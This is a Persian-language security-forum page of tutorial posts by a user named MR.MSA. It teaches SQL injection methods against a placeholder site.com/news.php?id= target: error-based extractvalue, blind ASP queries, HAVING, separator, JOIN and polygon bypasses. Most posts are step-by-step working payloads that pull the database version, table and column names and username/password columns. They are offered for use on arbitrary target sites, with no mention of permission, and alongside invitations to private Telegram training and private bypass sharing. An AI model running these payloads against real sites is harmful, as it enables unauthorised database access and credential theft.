    با سلام خدمت دوستان عزیز در این تاپیک هر کس تمایل دارد sql injection رو یاد بگیرد (به صورت انلاین ) که خودم آموزش می دهم اینجا اعلام کند . توی تلگرام آموزش می دهم . ابتدا باید این جا اعلام کنید تا برای شما پیام ارسال کنم . فقط کسانی که ثبت نام کردن می توانند در اموزش شرکت کنند و دیگر یه عضو خوب باشه تو انجمن ، فعال و گذاشتن پست و... امیدوارم لذت ببرید .
  15. MR.MSA

    اسیب پذیری Xpath Injection

    با سلام خدمت دوستان عزیز در این تاپیک قصد دارم به شما متد Xpath رو آموزش بدهم . Xpath injection کاربرد : 1. مثلا زمانی که در دستور +order+by+99999-- عدد 1 هم که می زنید صفحه لود نمی شود باید از این متد استفاده کنید . 2. زمانی که به ارورnumber of column the diffrent باید از این متد استفاده کنید . 3. زمانی که union…. را می زنید و با وجود اینکه تعداد درست است ولی به شما ستون اسیب پذیر را نشان ندهد . 4. و..... -------------- -------------- -------------- روش استفاده از متد xpath اول از بایپس هایی که بلدید استفاده کنید مثل : منفی پشت عدد ، source ، بزرگ کردن حروف و .... اگر مشکل حل نشد به سراغ این متد میاید . آموزش متد xpath : بدست اوردن ورژن : …..?sa=12+and+extractvalue(rand(),concat(0x7e,version()))-- 0x7e به معنای علامت (~) است . version() به معنای ورژن سایت است. در آموزش بعدی به شما بیرون کشیدن تیبل ها را آموزش می دهم .
  16. MR.MSA

    متد blind در سایت های asp

    با سلام خدمت شما کاربران و مدیران عزیز گارد ایران در این پست می خواهم به شما متد قدرتمند blind را در سایت های asp آموزش بدهم . Blind to asp تست اسیب پذیری : and 1=1 باید لود شود و and 1=2 نباید لود شود . نام دیتابیس با دستور : and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>97 97 که با کد ascii می شود a و داریم می گوییم حرف اول نام دیتابیس a است و اگر صفحه لود شد یعنی حرف اول a نیست و 97 مثلا می شود 98 یعنی b و به همین صورت پیش می روید یکی یکی تا اینکه به یک عدد برسید که صفحه لود نشود و ان اولین حرف نام دیتابیس هست و بیشتر کار ها هم مثل blind در mysql است و برای مثلا انجام دادن همین کار برای حرف دوم نام دیتابیس ان عدد را که در دستور بالا قرمز کردیم را مثلا کنید ۲ و برای حرف ۳ بکنید ۳ و به همین صورت . ببخشید که یک کمی طولانی شد . --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- نکته : اگر یک زمان نتیجه این طور شد : (مثلا برای حرف ۲‌) 99 ‌< true 100 > true 99 = false یعنی بیشتر از ۹۹ و کمتر از ۱۰۰ و ۹۹ هم نیست پس بین این ها ۹۹.۵ است که تخمین زده می شود به ۱۰۰ به این صورت : and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>99 = load and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>100 = no load and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)=99 = no load --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- بیرون کشیدن نام دیتابیس های بعدی : and isnull (ascii(substring(cast((select lower (db_name(0))) as varcher (8000)),1,1)),0)>97 برای اینکار ان عدد 0 را که آبی هست یکی یکی اضافه کنید تا یکی یکی بروید به دیتابیس بعد . مثال : and isnull (ascii(substring(cast((select lower (db_name(1))) as varcher (8000)),6,1)),0)>97 and isnull (ascii(substring(cast((select lower (db_name(2))) as varcher (8000)),4,1)),0)>98 and isnull (ascii(substring(cast((select lower (db_name(3))) as varcher (8000)),3,1)),0)>102 and isnull (ascii(substring(cast((select lower (db_name(4))) as varcher (8000)),1,1)),0)>107 --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- چون متد پیچیده ای هست و برای اینکه پست طولانی نشود در آموزش بعد به شما بیرون کشیدن تیبل ها را آموزش می دهم .
  17. MR.MSA

    Download Keyword

    برای پیدا کردن نوع دیتابیس یک سایت می توانید از افزونه های Wappalyzer و WgatRuns که در سایت هم معرفی شده استفاده کنید . در بعضی تارگت ها نمی توانید از این ها استفاده کنید و آن موقع است که از key word ها استفاده می کنیم و فقط باید یک key word را در کنار ادرس سایت قرار دهیم اگر سایت بدون هیچ مشکلی لود شد یعنی از همان دیتابیس استفاده می کند . مثال : site.com/news.php?id=1(key word) (در فایل KeyWords.txt می توانید key word های هر دیتابیس را مشاهده کنید و از آنها استفاده کنید . ) KeyWords.txt
  18. MR.MSA

    روش حرفه ای محدود سازی تیبل ها

    با سلام خدمت کاربران و مدیران عزیز گارد ایران توضیح مختصر در رابطه با جداول (table) تیبل های سیستمی : تیبل هایی که بیشتر مواقع با حروف بزرگ هستند و زیاد به کار ما نمیان . تیبل های user یا کاربری : تیبل هایی که ما با آنها کار داریم و بیشتر مواقع با حروف کوچک هستند . ما قبلا برای محدود سازی از این روش استفاده می کردیم : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+table_schema=database()-- و حالا در محدود سازی که می خواهم به شما آموزش دهم url به این طریق می شود : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+ascii(substring((table_name),1,1))>97-- و دارید می گویید که تمام تیبل هایی را که حرف های شان از عدد 97 (a) بیشتر است نمایش بده که اعداد بیشتر از 97 در کدگذاری ascii حروف کوچک هستند. برای اینکه بگویید تیبل هایی که حرف دوم آن ها کوچک است را برسی کند : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+ascii(substring((table_name),2,1))>97-- نکته : در این روش از کدگذاری ascii استفاده شده که عدد 97 به معنای a کوچک است . امیدوارم لذت برده باشید تشکر فراموش نشه
  19. MR.MSA

    متد Having

    بایپس نشان ندادن ستون آسیب پذیر اگر بایپس هایی مثل null کردن را انجام دادید و نتیجه نداد باید از Having استفاده کنید . نوع having ها : Having null Having false Having 0 Having 1 like 0 Having 1 limit 0 به این صورت : ......?id=1+<having>+union+select+1,2,3,4,5,6,7,8,9 در جایی که نوشته شده <having> باید نوع having را بنویسید . مثال : .....?id=2 having null+union+select+1,2,3,4,5,6,7,8,9-- تمام having ها را انجام دهید تا به نتیجه برسید . امیدوارم لذت برده باشید . فراموش نشه
  20. MR.MSA

    متد separator در sql injection

    با سلام خدمت دوستان و مدیران عزیز سایت GUARDIRAN در این پست قصد دارم به شما آموزش متد separator رو یدم ، در آموزش متد join اگر یادتون باشه نامی از متد separator رو بردم امروز گفتم شاید مبدتی ها با این متد آشنایی نباشند و آموزشش رو بدم . متد separator‌ : در زمان مرتب سازی تیبل ها ، ستون ها و یوزرنیم و پسورد ها شما میاید از کاما برای گذاشتن تگ br (به صورت hex) استفاده می کنید : ..........(group_concat(table_name,0x3c62723e...... حالا شاید در بعضی تارگت ها سایت به کاما حساس باشد در اینجا است که باید از متد separator استفاده کنید ، به این صورت : .......( group_concat((table_name)separator 0x3c62723e...... زیاد پست رو طولانی نمی کنم و گفتم متد ساده ای هست نیاز به توضیحات ندارد . ممنون که وقت گذاشتید و این تاپیک رو تا آخر خواندید .
  21. MR.MSA

    نکته مهم در متد join

    با سلام همانطور که در آموزش متد join در sql injection گفتم چند نکته در رابطه با متد join هست که باید بگویم که در این پست قرار است این نکات رو شرح بدم . در بعضی از تارگت ها ممکن است زمان محدود سازی سایت به = حساس باشد : union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ پس شما باید از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+group_concat(table_name)+from+information_schema.tables+where+table_schema+like+’dbname’)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 به جای dbname نام دیتابیس مورد نظر را بزنید (در بین دو کتیشن ) و اگر با مشکل مواجه شدید دو کتیشن را حذف کنید و نام دیتابیس را بصورت hex بنویسید . ------------------------------ برای بدست آوردن نام دیتابیس در متد join از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+database())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 ------------------------------ امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و متد join رو به خوبی یاد گرفته باشید . هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید . ************ MR.MSA ************ <آموزش متد polygon در sql injection > < آموزش متد join در sql injection > <دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس> <دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس> <دانلود نسخه های ۱ تا ۲ کالی لینوکس >
  22. MR.MSA

    آموزش متد polygon در sql injection

    با سلام خدمت کاربران و مدیران انجمن گارد ایران من MR.MSA در این پست قصد دارم متد polygon رو به شما آموزش بدهم . ------------------------------------ یکی از کاربرد های متد polygon زمانی است که :‌ در یک تارگت order+by و ... را زدید و تعداد تیبل ها را بدست اوردید و بعد خواستید تیبل ها را بیرون بکشید و با خطای error different number of columns مواجه شدید می توانید از متد polygon استفاده کنید . یکی دیگر از کاربرد های متد polygon زمانی است که :‌ با خطای Unknown column “language’ in ‘field list’ مواجه می شوید می توانید از متد polygon استفاده کنید . ------------------------------------ سطح متد : حرفه ای ------------------------------------ روش استفاده از متد polygon :‌ ابتدا مقدار را پاک کنید : site.com/news.php?id=1 ( نکته : در سایت های که مثلا دو مقدار است آن مقدار را پاک می کنید که اسیب پذیر است و بعد مراحل را پیش می روید . ) -------------- سپس این عبارت را قرار می دهید : http://site.com/news.php/id=polygon((select*from(select*from(select@@version)f)x)) و اگر ورژن را به شما نمایش داد یعنی می توانید از متد polygon استفاده کنید . یک جورایی میشه گفت جای که version است ستون آسیب پذیره. -------------- خب حالا می رویم سراغ بیرون کشیدن تیبل ها : site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(table_name) from information_schema.tables where table_schema=database())f)x)) قسمت های بنفش قسمت هایی هستند که تازه اضافه شده اند . توجه داشته باشید که به دلایلی دو (( آخر دستور در جاهای دیگر قرار گرفته اند اما در نگاه به این شکل است ولی زمانی که شما این دستور را کپی کنید و به url تارگت اضافه کنید درست نمایش داده می شود . ( در تمامی دستورات به همین شکل است ،‌ پس نگران نباشید ) -------------- (برای مثال تیبل مهمی که بدست می آوریم user است ) و حالا برای بیرون کشیدن ستون های یک جدول : site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(column_name)+from+information_schema.columns+where+table_name=’user’)f)x)) قسمت های بنفش قسمت های جدید هستند و باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن ) اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید . -------------- و می مونه بیرون کشیدن اطلاعات ستون های مهم : site.com.news.php/id=polygon((select*from(select*from(select@@group_concat(user,0x3a,pass) from ‘user’)f)x)) باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن ) و به جای user و pass نام ستون مهم خود را بنویسید . اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید . ------------------------------------ امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد polygon یک نکته های مونده که باید بگویم برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم . هر گونه سوال در مورد پست داشتید در قسمت سوال و جواب بپرسید .
  23. MR.MSA

    متد join در sql injection

    با سلام خدمت شما کاربران عزیز انجمن گارد ایران در این پست می خواهم متد join رو در باگ sql injection به شما آموزش بدهم . ------------------------ موارد قابل استفاده : ۱- مواجه شدن با خطا زمان استفاده از union select ۲- مواجه شدن با خطای : 'Unknown column ‘activo’ in ‘field list ۳- زمانی که سایت به عدد حساس است . ۴- و.... ------------------------ نکته :‌ در بیشتر سایت هایی که از متد join استفاده می شود سایت به + و یا به فاصله حساس است و شما به جای فاصله باید از /**/ استفاده کنید که من برای راحتی شما عزیزان فایلی را قرار دادم که در متد join به جای فاصله ها از /**/ استفاده شده . ------------------------ نحوه استفاده از متد join :‌ ---------------------------------------- ( برای مثال تعداد تیبل های سایت ۵ تا می باشد. ) مرحله اول بیرون کشیدن ستون آسیب پذیر :‌ +union+select+*from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select 5)e%23+ و همینطور تا اخر یعنی a و b و c باید کنار ( مقدار select ) قرار داشته باشند و مثلا ۱ می شود a و ۲ می شود b و به همین صورت و بین هر کدام یک join زمانی که به اخر رسدید دیگه join نمی خواهد و اینکه در اول باید بنویسید : from * توجه داشته باشید که هر عدد تبدیل شده است به یک سلکت (مقدار عدد ) ، یک حرف و join ---------------------------------------- ( برای مثال در خروجی ستون ۲ را نشان می دهد و ستون ۲ آسیب پذیر است. ) مرحله دوم بدست آوردن ورژن : +union+select+*from (select 1)a+join+(select version())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 ---------------------------------------- مرحله سوم بیرون کشیدن جدول (table) های دیتابیس (و محدود سازی تیبل ها برای نشان ندادن تیبل های سیستمی ) : union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ توجه داشته باشید در بیشتر سایت ها سایت به , حساس است به همین دلیل ما از متد separator برای مرتب سازی تیبل ها و تگ <br> استفاده کردیم و شما در صورت لزوم می توانید آن بخش هایی که بکگراند سفید دارند را حذف کنید . ---------------------------------------- ( برای مثال در بین تیبل ها تیبل msa_users وجود دارد . ) مرحله چهارم بیرون کشیدن ستون های یک تیبل : union+select+*from+(select 1)a+join+(select+group_concat(column_name)+from+information_schema.columns+where+table_name+like+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ به جای msa_users نام تیبل مهم خود را بنویسید و می توانید برای مرتب سازی ستون ها از متد separator مانند مرحله سوم استفاده کنید . ما از متد like هم استفاده کردیم و اینکه توجه داشته باشید که بیشتر مراحل مثل یونیم بیس هست . ---------------------------------------- ( برای مثال در خروجی ستون های user و pass مهم است . ) مرحله پنجم بیرون کشیدن اطلاعات در ستون های یک تیبل : union+select+*from+(select 1)a+join+(select+group_concat(user using ascii)+from+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ به جای msa_users نام تیبل مهم خود را بنویسید و به جای user نام ستون مهم خود را بنویسید. می توانید برای مرتب سازی یوزرنیم ها از متد separator مانند مرحله سوم استفاده کنید. و اینکه این یک بار برای یوزرنیم بود و برای پسورد به جای user می نویسید pass ( نام ستون مهم که مربوط به pass است ) ---------------------------------------- امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد join یک نکته های مونده که باید بگویم برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم منتظر کامنت های شما هستم . هر گونه سوال در مورد پست داشتید بپرسید . ********* MR.MSA ********** Join method in sql injection.txt
  24. بسم الله الرحمن الرحیم با اجازه ی دوستان می خوام تحولی در بایپس ها ایجاد کنم! ( البته با کمک دوستان) می خوام کاملترین آموزش بایپس ها SQL رو از مبتدی تا پیشرفته توی انجمن قرار بدم. انشاالله با کمک دوستان می خواهم جامع ترین تاپیک بایپس های اس کیو ال رو بزنیم. دوستان هم اگه بایپس خاصی رو بلدند حتی اگر priv8 هستش رو توی خصوصی به من بگویند تا توی آموزش ها ازش استفاده بشود. سعی میشه توی آموزشات تمامی بایپس ها توضح داده بشه و بایپسی از زیر دستمون در نره. J همچنین برای هر دستور یک پارت در نظر گرفته شده. (تا بتوانیم به طور جامع به هر دستور بپردازیم.) قوانین رو هم بلدید ، من دیگه متذکر نمیشم. با تشکر.

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...